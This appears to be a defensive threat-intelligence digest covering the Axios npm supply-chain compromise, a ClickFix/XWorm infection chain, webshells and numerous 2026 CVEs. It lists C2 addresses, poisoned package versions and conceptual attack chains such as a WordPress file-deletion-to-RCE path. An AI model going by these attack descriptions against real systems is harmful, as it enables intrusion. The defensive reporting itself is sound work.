The Axios story grew teeth this afternoon: SentinelOne and Socket.dev
published full IOC cards with C2 IP, domain, payload hashes, and
confirmed BlueNoroff/UNC1069 attribution — block
sfrclak[.]com and 142.11.206.73 now. CISA
added TrueConf CVE-2026-3502 to KEV, escalating this morning's Check
Point disclosure from targeted zero-day to federal remediation mandate.
A CVSS 9.8 Cisco IMC/SSM auth bypass (CVE-2026-20093) surfaced in
afternoon feeds. If you only do one thing: deploy the Axios IOCs.
What changed since morning: SentinelOne and Socket.dev published comprehensive technical analyses filling in the IOC gaps from CrowdStrike's morning attribution. The maintainer confirmed the attack vector: browser session hijacking ("lifting sessions or cookies"), not credential phishing. ~600,000 downloads occurred in the ~3-hour exposure window (March 31, 00:21–03:25 UTC). Attribution now corroborated across three vendors: CrowdStrike (STARDUST CHOLLIMA), SentinelOne (BlueNoroff/UNC1069), Microsoft (Sapphire Sleet).
New IOCs:
sfrclak[.]com →
142.11.206.73:8000, HTTP POST beacon every 60 secondsOrDeR_7077macWebT, linking to prior BlueNoroff webT campaigns
2023–2024)plain-crypto-js@4.2.1
(staging), axios@1.14.1, axios@0.30.4
(poisoned releases)Key new technical detail: the OIDC Trusted Publishing bypass worked because a legacy npm token coexisted alongside it — npm's auth logic prioritizes env-var tokens over OIDC, making the newer security mechanism irrelevant. The dropper self-destructs and replaces its own package.json with a clean decoy, leaving no trace in node_modules post-install. StepSecurity separately documented the 18-hour pre-staging and 39-minute dual-branch timing.
Immediate actions: block C2 at perimeter; grep all
node_modules and lockfiles for plain-crypto-js (lockfile
presence is a forensic indicator even after self-deletion); rotate all
credentials accessible from any system that installed affected versions
during the March 31 window. Sources: SentinelOne,
Socket.dev,
StepSecurity.
Covered by 3 sources.
The OIDC bypass is the architectural lesson: layered auth controls aren't additive when the old mechanism still works. First infection 89 seconds post-publication — manual incident response is structurally irrelevant at that tempo. This is xz-utils-level premeditation applied to the JavaScript ecosystem.
New story. Cisco patched CVE-2026-20093 (CVSS 9.8) in the Integrated Management Controller and Smart Software Manager — unauthenticated remote attackers can bypass authentication and gain elevated system access. IMC is the out-of-band management plane for Cisco UCS servers; compromise here is below-OS-level access, invisible to host EDR. No active exploitation reported yet. Source: The Hacker News.
If you're running Cisco UCS, this is your BMC/IPMI-equivalent auth bypass. Out-of-band management compromise doesn't show up in your SIEM. These get weaponized fast — patch today.
What changed since morning: CISA added CVE-2026-3502 to KEV citing confirmed active exploitation, validating this morning's Check Point report of China-nexus zero-day exploitation in SE Asian government networks. BOD 22-01 remediation obligations now apply for FCEB agencies. The enrichment EPSS (0.00009) is stale — it predates the KEV addition. Confirm the specific due date on the live KEV catalog.
Morning's "niche targeted zero-day in a video conferencing client chosen specifically for its air-gapped security" is now an officially confirmed actively-exploited vulnerability with a federal remediation mandate. The irony hasn't diminished.
New story. Threat actors seized administrative control of Drift Protocol's Security Council — a DeFi governance mechanism — and drained at least $280M. Independent researchers attribute to Lazarus Group. The attack vector is notable: governance/admin privilege seizure rather than smart contract exploitation, which is an emerging pattern in blockchain platform attacks. DPRK-attributed DeFi theft is now in the multi-billion-dollar cumulative range. Covered by 2 sources.
Governance mechanism attacks on DAOs are underappreciated relative to smart contract exploits. If the post-mortem confirms the takeover vector, expect replication against other on-chain governance systems. Adds to the DPRK theme dominating this week — they're running supply chain ops and $280M heists simultaneously.
New story. Censys
surfaced a live ClickFix campaign via a compromised Turkish medical
equipment site. Five-stage chain: ClickFix social engineering →
mshta.exe LOLBin (T1218.005) → emoji-obfuscated HTA → steganographic
JPEG from archive.org containing PhantomVAI MaaS loader →
process-hollowed XWorm V5.6 in RegAsm.exe (T1055.012). Full static
recovery achieved without sandbox execution. IOCs: C2
at 86.106.85[.]194:9000 (M247/AS9009), staging domain
4a-m[.]al, 7 SHA256 and 5 MD5 hashes across all stages.
PhantomVAI is sold on BreachForums, targeting government, healthcare,
tech, and manufacturing.
Probably the most forensically thorough writeup in today's batch. The enrichment pipeline missed the C2 IP — detection teams should add 86.106.85.194 manually. PhantomVAI's MaaS model means the specific operator is unknown but the loader is shared across campaigns.
New story. Wordfence
weekly report covers 106 vulnerabilities across 77 plugins and 22
themes. Headliners: CVE-2026-4001 (CVSS 9.8) —
unauthenticated RCE via unsanitized eval() on
attacker-controlled pricing formula in WooCommerce Custom Product Addons
Pro. CVE-2026-4350 (CVSS 8.1) — unauthenticated
arbitrary file deletion in Perfmatters
(200K+ installations): delete wp-config.php via path traversal → force
installer → hijack database → RCE. CVE-2026-4283 (CVSS
9.1) — unauthenticated account destruction in WP DSGVO Tools. Six
vulnerabilities remain unpatched. Covered by 2 sources.
eval()on attacker input in 2026. The Perfmatters kill chain (file deletion → installer → database hijack) is the more interesting attack path. Six unpatched vulns including PHP object injection are the residual risk for WordPress operators.
What changed since morning: Beyond the Adversa AI prompt injection finding covered this morning, threat actors have created fake GitHub repos distributing the leaked Claude Code source as bait, delivering Vidar infostealer and GhostSocks proxy malware as second-stage payloads. Tens of thousands of downloads. Covered by 4 sources.
Separate threat threads sharing a common trigger event: the prompt injection vuln is a code-level finding, the trojanized repos are social engineering. "Download the leaked source and see how it works" is a textbook developer-targeted lure and will recur with any high-profile AI tool leak.
New story. Microsoft Defender research documents active targeting of Linux hosting environments with PHP webshells that gate execution on attacker-supplied HTTP cookie values — remaining completely dormant during normal traffic, invisible in logs. Cron jobs via cPanel/jailshell recreate the obfuscated PHP loader if removed, defeating standard cleanup. Attack chain: compromised hosting creds → cPanel → cron-scheduled obfuscated loader → cookie-gated RCE on demand. ATT&CK: T1505.003, T1053.003, T1027. KQL hunting queries provided for Defender XDR.
The self-healing cron + cookie-gating combination is what makes this nasty. Webshell is invisible during normal traffic AND survives remediation without simultaneous cron cleanup. Shared hosting operators are the primary risk population.
New story. Microsoft's post-RSAC threat landscape report quantifies AI-assisted phishing at 54% click-through vs. ~12% traditional — a 450% improvement in attacker economics driven by precision targeting. Tycoon2FA (Storm-1747) disrupted via 330 domain seizures with Europol after handling ~62% of Microsoft-blocked phishing at peak. Tycoon2FA operated as subscription-based AitM bypassing MFA by intercepting session tokens in real time.
12% → 54% is not marginal — it's a category shift. The Tycoon2FA disruption is supply-chain pressure, not a terminal takedown; the modular subscription model means capability disperses to successor platforms.
New story. Researchers demonstrated Rowhammer extended to Nvidia GPU DRAM, enabling malicious cloud co-tenants to achieve full root on physical host machines. Structural analog to Spectre/Meltdown for the multi-tenant GPU cloud era. Full paper with affected GPU SKUs and ECC effectiveness pending.
Relevant for anyone running multi-tenant GPU cloud (AWS P-series, Azure ND-series, GCP A100/H100 pools). The threat model: malicious ML workload tenant compromises the hypervisor via GPU Rowhammer. Watch for the full paper.
New story. Schneier covers an executive order requiring FCC approval for any new foreign-manufactured router, with foreign investor/influence disclosure and a credible manufacturing shift plan. Only significant US-made consumer router currently: Starlink WiFi. Does not require disposal of existing hardware. Netgear and other major brands manufacture entirely abroad.
Procurement teams should flag this immediately. The Volt Typhoon router pre-positioning concern is clearly the underlying driver. Watch the DoD/DHS exemption list — that's where enterprise-grade foreign-manufactured equipment may get carved out.
New story. Thirteen CVEs in Rack (web server interface underpinning Rails and the Ruby ecosystem), affecting versions up to 2.2.22, 3.1.20, and 3.2.5. Bug classes span CRLF injection, ReDoS, path traversal, X-Accel-Mapping header abuse, and multipart resource consumption. Coordinated disclosure with GHSA references on the majority. Fix: ≥3.2.6 / ≥3.1.21 / ≥2.2.23.
The Rack::Sendfile X-Accel-Mapping permissive regex (CVE-2026-34830) could enable internal file exposure via nginx accelerated serving — that's the one to prioritize for web security teams.
What changed since morning: The routine "five security fixes" mention now has CVE identifiers: CVE-2026-35388 (unprotected alternate channel in proxy-mode multiplexing), CVE-2026-35386 (ssh_config behavior order), CVE-2026-35387/35414 (control flow including certificate authorized_keys), CVE-2026-35385 (scp permissions). No CVSS or exploitation data yet. CVE-2026-35388 is the one to watch — ControlMaster/ControlPath session hijacking or privilege escalation in multi-user environments. Sources: VulDB entries.
The afternoon Talos coverage also flags without dedicated entries: F5 BIG-IP DoS-to-critical-RCE upgrade now exploited in the wild with a CISA warning, and Google Chrome's fourth zero-day of 2026. Watch for standalone coverage on both.
No significant changes since morning on: NetScaler KEV deadline, ShareFile RCE chain, DarkSword/Coruna iOS exploit kits, Qilin EDR killer, BRICKSTORM vSphere, BPFDoor variants, Hitachi Energy Ellipse, Siemens SICAM 8, Yokogawa CENTUM VP, Vite dev server, EvilTokens PhaaS, Handala/Stryker, Keycloak, TeamPCP cascade, TasksJacker, or the broader DPRK supply chain cluster beyond Axios.
~52 entries skipped: 27 general (Apple nostalgia, AI model releases, vendor marketing, Gartner frameworks, EFF policy, off-topic tech), 21 vulnerability (VulDB stubs for Acronis/SillyTavern/postiz-app/SignalK/mbed TLS/Balena Etcher, misc WordPress/PHP CMS), 3 government (DOJ non-cyber press releases — feed is pulling broad OPA output), 1 threat-actor (broken ReversingLabs feed fetch).
Editorial note: the afternoon's primary value-add is the Axios IOC card — morning had attribution and alarm, afternoon has the blocking indicators and forensic artifacts your SOC actually needs. Cisco IMC CVSS 9.8 and TrueConf's KEV promotion are the other action items. Everything else is incremental or new-but-not-urgent. The DPRK is having quite a week.